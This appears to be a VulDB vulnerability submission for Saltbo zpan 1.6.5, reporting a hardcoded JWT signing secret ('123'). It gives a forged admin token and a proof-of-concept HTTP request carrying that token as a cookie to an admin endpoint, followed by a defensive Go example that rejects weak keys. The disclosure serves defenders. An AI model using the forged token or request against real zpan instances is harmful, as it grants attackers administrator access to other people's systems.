Submission #608447: Saltbo zpan 1.6.5 Hard-coded Credentials

Title: Saltbo zpan 1.6.5 Hard-coded Credentials
Description:

# Summary

A critical security vulnerability has been identified in Saltbo/zpan v1.6.5, where the system uses a hardcoded JWT (JSON Web Token) secret key "123" for token signing. This implementation flaw allows attackers to forge valid authentication tokens, bypassing security controls and gaining unauthorized access to any zpan instance running this version.

# Details

The vulnerability stems from the use of a static HMAC-SHA512 (HS512) secret key ("123") for JWT signing in the z-token authentication mechanism.

**Algorithm:** HS512 (HMAC-SHA512)
**Hardcoded Secret Key:** 123
**Sample Admin JWT Token:** eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJ6cGxhdFVzZXJzIiwiZXhwIjoxNzUyMTQwMTkxLCJpYXQiOjE3NTE1MzUzOTEsImlzcyI6InpwbGF0IiwibmJmIjoxNzUxNTM1MzkxLCJzdWIiOiIxIiwicm9sZXMiOlsiYWRtaW4iXX0.lhYjZpv4PAZSeq2zaLJDSgXvV5Lef2sArafHA2PQnTCeeUDT0yvPkG3qv5axKLBj-AeeAjWz3Y57_rrTavP4g

# POC

```
GET /api/system/options/core.email HTTP/1.1
Host: target-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: z-token=eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJ6cGxhdFVzZXJzIiwiZXhwIjoxNzUyMTQwMDg5LCJpYXQiOjE3NTE1MzUyODksImlzcyI6InpwbGF0IiwibmJmIjoxNzUxNTM1Mjg5LCJzdWIiOiIxIiwicm9sZXMiOlsiYWRtaW4iXX0.a_B2Kzq9ZIi3-kqz0VcIsqX39Abn_Je2TUl_gt67ZkpbKt31hwa-vvrS9H2LIw2n7TmJwtk59tmsVkk9wQiZxQ;
Connection: keep-alive
```
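The root cause reported above is a static, three-character HS512 key. As an added example (not zpan's own token.go, which is not reproduced here), the Go code below shows the controls a hardened token implementation would apply: a startup check that refuses denylisted or too-short keys (the denylist includes the reported default "123"; "secret" and "changeme" are constructed extras), key generation from the OS CSPRNG, and a verifier that pins the alg header to HS512 and compares the HMAC in constant time before reading any claim. Function names and the 64-byte floor are this example's choices; the claim fields mirror those visible in the sample token.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha512"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// HMAC-SHA512 emits a 64-byte tag and RFC 7518 §3.2 requires an HS512 key at
// least that long, so a three-character default can never pass this check.
const minSecretBytes = 64

// Values that must never be used as a signing key. "123" is the default the
// advisory reports for zpan 1.6.5; "secret" and "changeme" are constructed.
var knownWeakSecrets = map[string]bool{"123": true, "secret": true, "changeme": true}

var b64 = base64.RawURLEncoding

// CheckSecret rejects denylisted and too-short keys; run it at startup so a
// misconfigured instance refuses to serve instead of signing weak tokens.
func CheckSecret(secret []byte) error {
	if knownWeakSecrets[string(secret)] {
		return errors.New("jwt secret is a known default; generate a random one")
	}
	if len(secret) < minSecretBytes {
		return fmt.Errorf("jwt secret is %d bytes, need at least %d", len(secret), minSecretBytes)
	}
	return nil
}

// GenerateSecret draws a fresh key from the OS CSPRNG; operators would store it
// encoded in an environment variable or secret manager, never in source.
func GenerateSecret() ([]byte, error) {
	secret := make([]byte, minSecretBytes)
	if _, err := rand.Read(secret); err != nil {
		return nil, err
	}
	return secret, nil
}

// Claims mirrors the fields visible in the advisory's sample token.
type Claims struct {
	Iss   string   `json:"iss"`
	Sub   string   `json:"sub"`
	Roles []string `json:"roles"`
	Exp   int64    `json:"exp"`
}

// Sign builds a compact HS512 JWT and refuses to sign with a weak key.
func Sign(secret []byte, c Claims) (string, error) {
	if err := CheckSecret(secret); err != nil {
		return "", err
	}
	payload, err := json.Marshal(c)
	if err != nil {
		return "", err
	}
	input := b64.EncodeToString([]byte(`{"alg":"HS512","typ":"JWT"}`)) + "." + b64.EncodeToString(payload)
	mac := hmac.New(sha512.New, secret)
	mac.Write([]byte(input))
	return input + "." + b64.EncodeToString(mac.Sum(nil)), nil
}

// Verify pins alg to HS512 (rejecting "none" and algorithm confusion), checks
// the tag in constant time before parsing claims, then enforces expiry against
// now (Unix seconds, passed in so callers can test it deterministically).
func Verify(secret []byte, token string, now int64) (*Claims, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, errors.New("malformed token")
	}
	hdrJSON, err := b64.DecodeString(parts[0])
	var hdr struct{ Alg string `json:"alg"` }
	if err != nil || json.Unmarshal(hdrJSON, &hdr) != nil || hdr.Alg != "HS512" {
		return nil, errors.New("unexpected header; only HS512 is accepted")
	}
	sig, err := b64.DecodeString(parts[2])
	if err != nil {
		return nil, errors.New("malformed signature")
	}
	mac := hmac.New(sha512.New, secret)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if !hmac.Equal(sig, mac.Sum(nil)) {
		return nil, errors.New("invalid signature")
	}
	claimsJSON, err := b64.DecodeString(parts[1])
	var c Claims
	if err != nil || json.Unmarshal(claimsJSON, &c) != nil {
		return nil, errors.New("malformed claims")
	}
	if now >= c.Exp {
		return nil, errors.New("token expired")
	}
	return &c, nil
}
```

The decisive control is the startup check: a service that calls CheckSecret before accepting its configuration cannot reach production with the key the advisory describes, and the same denylist gives defenders a concrete value to grep for in deployed configuration files.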
Source: https://github.com/saltbo/zpan/issues/219
User: jiashenghe (UID 39445)
Submitted: 03/07/2025 12:07 (12 months ago)
Moderation: 11/07/2025 10:50 (8 days later)
Status: Accepted
VulDB Entry: 316097 [saltbo zpan up to 1.6.5/1.7.0-beta2 JSON Web Token token.go NewToken weak authentication]
Points: 20
